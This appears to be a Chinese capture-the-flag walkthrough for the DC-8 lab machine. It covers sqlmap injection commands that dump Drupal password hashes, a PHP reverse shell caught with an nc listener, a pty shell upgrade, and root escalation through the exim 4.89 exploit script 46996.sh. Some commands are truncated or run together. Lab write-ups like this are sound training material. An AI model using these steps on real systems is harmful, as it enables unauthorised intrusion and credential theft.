靶机DC-8（靶机DC-1怎么改密码）

靶机DC-8（靶机DC-1怎么改密码）

靶机下载

靶机下载地址：​​-sn 192.168.74.0/24

判断出目标主机IP后扫描主机

nmap -A 192.168.74.132

SQL注入

访问ip看下站点，看到左侧有个列表

看到url有?nid=2，试下sql注入

随便试个，出现报错，直接sqlmap跑下

上来就是sqlmap四连

sqlmap -u --dbs获取数据库名

sqlmap -u --tables -D d7db获取d7db数据库中的表名

sqlmap -u --columns -T users -D d7db获取d7db数据库中user表的内容

sqlmap -u --dump -C "name,pass" -T users -D d7db获取d7db数据库中users表中name,pass字段的值

根据DC3的经验，直接用john进行解密

把要解密的密文写到txt文件中

得到turtle

反弹shell

百度查下drupal后台路径

访问​​US界面可以编辑

写入点：Home>Contact Us>WebForm>Form settings

记得先设置php代码，写上回连语句，保存在页面最下方

kali上设置监听端口

nc -lvp 666

然后退出登录，在Contact Us界面填写信息，随便填

提交后回连成功

获取交互模式shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

试了下sudo -l 没东西，再看下哪些指令有root权限

find / -perm -u=s -type f 2>/dev/null

用searchsploit搜索下exim相关信息

searchsploit exim

再看下exim的版本，4.89

找到对应版本的提权脚本进行利用

这个46996.sh文件在/usr/share/exploitdb/exploits/linux/local下

靶机中tmp目录权限较高，可以把文件上传到这里

kali有web服务的前提下，把脚本文件放到/var/777 46996.sh./46996.sh

报错，搜下bad interpreter，编码格式问题

附链接：​​-i "s/\r//" filename即可

sed -i "s/\r//" 46996.sh

貌似是成功了，但是好像还没权限

看了下脚本文件，发现还差一步

./46996.sh -m setuid

还是进不了root目录

再试下第二种方法

./46996.sh -m netcat

拿到flag~

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。